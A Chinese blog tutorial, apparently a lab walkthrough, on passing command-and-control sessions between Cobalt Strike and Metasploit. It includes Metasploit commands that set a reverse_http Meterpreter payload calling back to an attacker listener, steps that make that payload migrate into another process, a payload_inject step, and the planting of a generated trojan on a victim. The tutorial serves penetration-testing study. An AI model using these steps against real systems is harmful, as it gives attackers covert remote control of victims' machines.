Cobalt Strike 会话管理

最新推荐文章于 2024-05-31 13:53:22 发布
最新推荐文章于 2024-05-31 13:53:22 发布
阅读量442 收藏
点赞数
分类专栏: 渗透工具Cobalt Stike使用 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/127908810
版权

测试环境

系统服务ip
kaliteamserver192.168.0.104
kalimetasploit192.168.0.134
xpvictim192.168.0.158
win10victim192.168.0.143

会话管理

1.cobalt strike派生会话

自身增加会话

或者在其他的teamserver做备份会话

先 创建一个新的监听器

派生一个会话到端口6666

可以看到工具终端已经执行

这里会显示多了出来

 再来派生到6666端口

大概过一分钟,就会多了一个会话

 把所有会话转到metasploit主机服务

转到【team20】 http-beacon

换端口8888

所有到刚刚选择的8888端口

2.cobalt strike派生metasploit会话

先在kali里面打开msf

创建外部监听器,与metasploit交互  。因为metasploit用的tcp,所以这也是tcp   

 

过一分钟,可以在kali中看到二个session

 3.metasploit生成木马与cobalt strike会话

在kali中生成木马文件

在cobalt strike新建监听器

把生成的木马shell.exe放到windows xp中,然后打开它,在工具中会返回机子会话信息 

 4.metasploit使用溢出exp与cobalt strike会话

show options

设置SRVHOST

 然后show payload,然后set payload windows/meterpreter/reverse_http

 然后show options看下参数有无错误

然后设置payload的参数

set LHOST 192.168.0.104

set lport 8888

set disablepayloadhandler True

set PrependMigrate true

set disablepayloadhandler True

将DisablePayLoadHandler设置为true。这告诉metasploit框架,它不需要在metasploit框架内创建处理程序来服务有效负载连接。

set PrependMigrate true

 这个选项告诉metasploit框架修改stager,以便在利用之后立即迁移到另一个进程。此选项对于客户端攻击非常重要。它允许您的会话在被利用的应用程序奔溃或关闭存活。

 复制该url到IE浏览器中执行,kali这边会加载 VBS stager 注:该链接带有攻击代码

在工具中会显示多了一个主机信息即产生一个会话

 5.metasploit session派生会话给 cobalt strike

 首先产生sessions,用的是IE浏览器的漏洞

先把前面这二个模块改回来

改成tcp协议,然后show options

 改lhost和lport,然后show options

同样把url放到IE浏览器中访问,看有无sessions返回

为产生会话在工具中,还需设置

 

 use exploit/windows/local/payload_inject   

 set session 3

set payload windows/meterpreter/reverse_http

上面set lhost设置错误,应该改设端口,下面开始重新设置

设置完毕

 这时在工具中会多了一个主机会话信息

还可以再产生一个会话

jack-yyj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell
limb0的博客
12-07 1554
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell 实验环境 系统 IP地址 CS(服务器/客户端) kali 192.168.134.130 靶机 win7 192.168.134.135 MSF kali 192.168.134.138 ...
Cobalt Strike会话管理
f_carey的博客
01-06 466
Cobalt Strike会话管理1 增加 CS 会话2 利用 CS 会话生成 MSF 会话3 利用 msfvenom 生成的文件生成 MSF 会话4 利用 MSF 会话生成 CS 会话 1 增加 CS 会话 添加新侦听器 在获得的 session 会话中选择"新建会话(spawn)":选择新添加的侦听器 获取到新的会话 2 利用 CS 会话生成 MSF 会话 添加新外部侦听器 配置 MSF 如下 msf6 > use exploit/multi/handler
CobaltStrike基本渗透
最新发布
banliyaoguai的博客
05-31 884
CobaltStrike(简称CS)是一款专业的团队作战渗透测试工具,包含客户端和服务端两个部分。
Cobalt Strike(五)会话管理
qq_56426046的博客
09-20 1080
测试环境系统服务ipteamservermetasploitvictimvictim。
CobaltStrike使用-第二篇(攻击模块、会话管理、CS-MSF联动)
Love&Share
11-30 2089
文章目录攻击用户驱动攻击用户截屏进程管理文件管理远程VNC浏览器代理用户发现&端口扫描视图会话管理会话传递相关命令CS派生会话CS派生MSF会话MSF木马->CS会话MSFexp->CS会话MSFsession派生到CS 攻击 当我们拿到Victim的Beacon之后就要进行攻击,CS中提供了很多攻击模块,接下来介绍常见使用方法 用户驱动攻击 用户截屏 在目标中选择屏幕截图即可获取截图,截图会在视图->屏幕截图中显示 因为默认会话60秒返回一次,所以再执行操作60秒之后会得到.
cobaltstrike中文版.zip
05-17
这个“cobaltstrike中文版.zip”文件包含了Cobalt Strike的中文版本,这对于中文使用者来说是一个很好的资源,能够帮助他们更好地理解和操作这款工具。 Cobalt Strike的核心功能包括: 1. **Beacon**:这是Cobalt ...
CobaltStrike4.1
03-10
1. **Team Server**:是Cobalt Strike的核心,负责管理Beacon会话、存储数据和执行任务。 2. **Beacon**:是植入到目标系统中的轻量级代理,用于执行命令、收集信息和进行横向移动。 3. **Malleable C2**:允许用户...
CobaltStrike4.0渗透测试手册
03-18
4. **Meterpreter会话管理**:Meterpreter是一种强大的后渗透工具,手册将阐述如何启动、管理及利用Meterpreter会话进行更深入的渗透测试。 5. **社会工程工具**:Cobalt Strike内置的社会工程工具,如钓鱼邮件生成...
cobaltstrike4.3.zip
12-03
在渗透测试过程中,Cobalt Strike的Meterpreter会话管理器也是一个关键组件。这个模块在4.3版本中提供了更多的API函数,使得测试人员可以在目标系统上执行更复杂的操作,如文件管理、注册表操作、进程控制等。同时,...
cobaltstrike4.0
05-27
4. **更丰富的团队服务器功能**:团队服务器是Cobalt Strike的指挥中心,用于管理Beacon会话和任务。新版本可能强化了审计和管理功能,便于操作员跟踪和控制整个渗透测试过程。 5. **自动化和脚本支持**:Cobalt ...
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和teamserver执行权限) ./teamserver ip 密码 2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd 即可启动 默认连接端口50050
【渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】
AA8j的博客
06-29 306
会话管理 1.CS会话派生到CS 首先新建一个监听器用于监听派生的会话 右键要派生的会话点击spawn 然后选择派生到刚刚新建的监听器上,点击choose即可。 也可以先连接其它cs服务器新建监听器,将会话派生到其它cs服务器上 2.CS会话派生到MSF 开启MSF监听: 在CS上创建监听器并指向MSF监听的地址: 通过Spawn将已有会话派生到新创建的监听器中: 可以看到会话成功派生到了MSF上: 3.MSF派生CS会话 1.生成木马直接回连到CS CS新建
Cobalt Strike与Metasploit Framewor联动(会话传递)功能演示
imtech的博客
02-07 571
Cobalt Strike与Metasploit Framewor联动 会话传递
CobaltStrike与Metasploit会话相互派生
box
03-01 361
CobaltStrike与Metasploit会话相互派生 0x01 CS ===> MSF 步骤 CS创建Foreign监听器 MSF 设置监听 和同类型payload CS 执行Spawn 派生到 MSF对应的监听器 1.1 CS创建Foreign监听器 1.1 MSF 设置监听 和同类型payload 使用监听器 exploit/multi/handler 模块 使用 同CS 监听器(msf)同类型 payload 运行 exploit 1.3 CS 执行Spawn 派生到 MSF对应
永恒之蓝ms17-010复现并转移会话CobaltStrike
x0916的博客
06-08 887
ms17-010漏洞及CobaltStrike会话的转移
内网安全Cobalt Strike 与 MSF 联动( 会话 相互转移 )
网络安全领域___专研者.
06-14 3711
在渗透中,有时候Cobalt Strike会话可能会受限制,所以我们需要把 Cobalt Strike会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上,但是我们需要操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike 上进行后面的渗透.
152.网络安全渗透测试—[Cobalt Strike系列]—[会话管理/派生]
qwsn
03-24 2522
一、会话管理 1、实验环境 2、会话派生 (1)128的cs会话派生给128的cs本身 (2)128的cs会话派生给129的cs会话 (3)128的cs会话派生到129的msf会话 (4)129的msf生成木马 + 128的cs获取新会话 (5)129的msf溢出exp发到128的cs会话 (6)129的msf会话派生给128的cs会话
MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击
da_chuan_chuan的博客
04-27 1564
文章目录前言一、将CS会话派生给MSF1、前期准备:2、Cobaltstrike派生会话给MSF二、MSF进行内网攻击1、前言:2、攻击步骤如下三、将MSF中的会话派生给CS1、前言2、使用步骤:总结 前言 本文主要介绍MSF与CobaltStrike联动相互进行会话派生,这样可以最大化利用这两个工具的优点。同时这里还进行了衍生,通过将会话传到MSF上,MSF通过添加路由来访问内网主机,再用MSF进行永恒之蓝攻击拿下shell,并派生回CobaltStrkie。 当前网络设置为: 一、将CS会话
Cobalt Strike 插件
08-10
这些插件可以在CobaltStrike 4.0以上版本中运行,并且可以在实验中成功上线。另外,根据引用和,Cobalt Strike的SSH客户端使用SMB Beacon协议,并实现Beacon命令调用以及子功能的使用。SSH会话可以看作是包含较少...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值